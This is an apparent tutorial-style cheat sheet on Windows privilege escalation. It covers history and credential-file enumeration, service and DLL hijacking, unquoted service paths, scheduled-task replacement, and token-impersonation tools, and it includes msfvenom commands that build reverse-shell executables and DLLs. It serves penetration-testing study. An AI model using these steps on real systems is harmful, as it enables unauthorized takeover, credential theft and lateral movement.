Introduction
What is Privilege Escalation?
A privilege escalation is a cyberattack designed to gain unauthorized privileged access into a system. This not only make us able to access all resources on the system, but also closely related to lateral movement. We can dump other user’s credential which saved in the system, so that we can use these credential to try to access other devices on the same intranet. Here I will show you same common method to make a privilege escalation on the Windows Operating System.
Manual Enumeration (Information Gathering)
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
: check user command historywhoami /priv
: check your permissionGet-ChildItem -Path C:\ -Include *.kdbx,*.zip,*backup* -File -Recurse -ErrorAction SilentlyContinue
: search key filetype C:\Users\Public\Transcripts\transcript01.txt
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
: list all installed application- Event Viewer: Check Script Block Logging
whoami /groups
: check my permission groupGet-Process
: list all running processsysteminfo
: check system version and try to find a kernel vulnerabilitynetstat -ano
: list all active connections
Automated Enumeration (Information Gathering)
- winPEASx64.exe
- Seatbelt:
Seatbelt.exe -group=all
Service Binary Hijacking
Service Binary Hijacking
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Find out the service which is executed by administrator
We can use
icacls
to check if we have enough permission to overwrite the target executable file. Usage:icacls "C:\path\to\program\program.exe"
Generate your Trojan executable file (reverse shell):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[local host] LPORT=[local port] -f exe -o reverse.exe
Replace the target executable file with our Trojan file
Restart-Service [service]
Service DLL Hijacking
Generate your payload dll (reverse shell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[local host] LPORT=[local port] -f dll -o payload.dll
Start Procmon64.exe (RDP connection needed), find out the service which is executed by administrator
Find all dll which the target service used from Procmon64.exe
Replace the corresponded dll file with our Trojan dll
Restart-Service [service which include this dll]
Unquoted Service Paths
- Find a service which run path contains spaces without quotes:
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
(execute in cmd terminal)
- Inject our Trojan file (generate by
msfvenom
) Start-Service -Name "ServiceName"
(PowerShell)
Scheduled Tasks
- Check scheduled task executable file’s permission
schtasks /query /fo LIST /v | Select-String '(?i)TaskName|Next Run Time|Author|Run As User|Task To Run|^\s*$'
- Check Permission:
icacls C:\Path\to\taget\<target>.exe
- Replace it with your Trojan file (you can generate it by
msfvenom
)
- Wait it execute
Using Exploits
Check permission:
whoami /priv
Find SeImpersonatePrivilege permission
Use PrintSpoofer / GodPotato
Check .NET version:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version -ErrorAction SilentlyContinue | Where-Object { $_.Version -match '^\d+\.\d+' } | Select-Object PSChildName, Version
GodPotato usage:
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
Others vulnerable permission: SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug
By the way
Privilege escalation is very flexible, and the methods I introduced are only the most common ones. In a real case, you need to do the information gathering carefully, and try to exploit human behaviors, design flaws or oversights in operating systems or web applications. I recommend carefully checking the output information of winpeas, which often contains vulnerabilities that you can use to escalate privileges.